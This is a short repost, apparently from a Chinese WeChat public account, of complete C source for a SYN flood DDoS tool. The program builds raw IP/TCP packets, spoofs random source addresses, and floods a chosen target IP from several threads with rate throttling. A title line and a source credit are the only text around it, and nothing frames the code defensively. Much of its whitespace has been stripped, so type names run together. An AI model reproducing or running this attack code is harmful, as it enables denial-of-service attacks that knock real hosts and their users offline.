神秘的ddos之SYN攻击的脚本源码

#include <unistd.h>#include <time.h>#include <sys/types.h>#include <sys/socket.h>#include <sys/ioctl.h>#include <string.h>#include <stdlib.h>#include <stdio.h>#include <pthread.h>#include <netinet/tcp.h>#include <netinet/ip.h>#include <netinet/in.h>#include <netinet/if_ether.h>#include <netdb.h>#include <net/if.h>#include <arpa/inet.h>#define MAX_PACKET_SIZE 4096#define PHI 0x9e3779b9staticunsignedlongint Q[4096], c = 362436;volatileint limiter;volatileunsignedint pps;volatileunsignedint sleeptime = 100;voidinit_rand(unsignedlongint x){int i;Q[0] = x;Q[1] = x + PHI;Q[2] = x + PHI + PHI;for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }}unsignedlongintrand_cmwc(void){unsignedlonglongint t, a = 18782LL;staticunsignedlongint i = 4095;unsignedlongint x, r = 0xfffffffe;i = (i + 1) & 4095;t = a * Q[i] + c;c = (t >> 32);x = t + c;if (x < c) {x++;c++;}return (Q[i] = r - x);}unsignedshortcsum(unsignedshort *buf, int count){registerunsignedlong sum = 0;while( count > 1 ) { sum += *buf++; count -= 2; }if(count > 0) { sum += *(unsignedchar *)buf; }while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }return (unsignedshort)(~sum);}unsignedshorttcpcsum(struct iphdr *iph, struct tcphdr *tcph){structtcp_pseudo{unsignedlong src_addr;unsignedlong dst_addr;unsignedchar zero;unsignedchar proto;unsignedshort length;} pseudohead;unsignedshort total_len = iph->tot_len;pseudohead.src_addr=iph->saddr;pseudohead.dst_addr=iph->daddr;pseudohead.zero=0;pseudohead.proto=IPPROTO_TCP;pseudohead.length=htons(sizeof(struct tcphdr));int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);unsignedshort *tcp = malloc(totaltcp_len);memcpy((unsignedchar *)tcp,&pseudohead,sizeof(struct tcp_pseudo));memcpy((unsignedchar *)tcp+sizeof(struct tcp_pseudo),(unsignedchar *)tcph,sizeof(struct tcphdr));unsignedshort output = csum(tcp,totaltcp_len);free(tcp);return output;}voidsetup_ip_header(struct iphdr *iph){iph->ihl = 5;iph->version = 4;iph->tos = 0;iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);iph->id = htonl(54321);iph->frag_off = 0;iph->ttl = MAXTTL;iph->protocol = 6;iph->check = 0;iph->saddr = inet_addr("xx.xx.xx.xx");}voidsetup_tcp_header(struct tcphdr *tcph){tcph->source = htons(5678);tcph->seq = rand();tcph->ack_seq = 1;tcph->res2 = 0;tcph->doff = 5;tcph->syn = 1;tcph->window = htons(65535);tcph->check = 0;tcph->urg_ptr = 0;}void *flood(void *par1){char *td = (char *)par1;char datagram[MAX_PACKET_SIZE];structiphdr *iph = (struct iphdr *)datagram;structtcphdr *tcph = (void *)iph + sizeof(struct iphdr);structsockaddr_insin;sin.sin_family = AF_INET;sin.sin_port = htons (rand() % 20480);sin.sin_addr.s_addr = inet_addr(td);int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);if(s < 0){fprintf(stderr, ":: cant open raw socket. got root?n");exit(-1);}memset(datagram, 0, MAX_PACKET_SIZE);setup_ip_header(iph);setup_tcp_header(tcph);tcph->dest = htons (rand() % 20480);iph->daddr = sin.sin_addr.s_addr;iph->check = csum ((unsignedshort *) datagram, iph->tot_len);int tmp = 1;constint *val = &tmp;if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){fprintf(stderr, ":: motherfucking error.n");exit(-1);}init_rand(time(NULL));registerunsignedint i;i = 0;while(1){sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);iph->check = csum ((unsignedshort *) datagram, iph->tot_len);tcph->seq = rand_cmwc() & 0xFFFF;tcph->source = htons(rand_cmwc() & 0xFFFF);tcph->check = 0;tcph->check = tcpcsum(iph, tcph);pps++;if(i >= limiter){i = 0;usleep(sleeptime);}i++;}}intmain(int argc, char *argv[ ]){if(argc < 5){fprintf(stderr, "Invalid parameters!n");fprintf(stdout, "Usage: %s <IP> <threads <throttle, -1 for no throttle> <time>n", argv[0]);exit(-1);}int num_threads = atoi(argv[2]);int maxpps = atoi(argv[3]);limiter = 0;pps = 0;pthread_t thread[num_threads];int multiplier = 20;int i;for(i = 0;i<num_threads;i++){pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);}fprintf(stdout, ":: sending all the packets..n");for(i = 0;i<(atoi(argv[4])*multiplier);i++){usleep((1000/multiplier)*1000);if((pps*multiplier) > maxpps){if(1 > limiter){sleeptime+=100;} else {limiter--;}} else {limiter++;if(sleeptime > 25){sleeptime-=25;} else {sleeptime = 0;}}pps = 0;}return0;}

原文始发于微信公众号（7维空间）：神秘的ddos之SYN攻击的脚本源码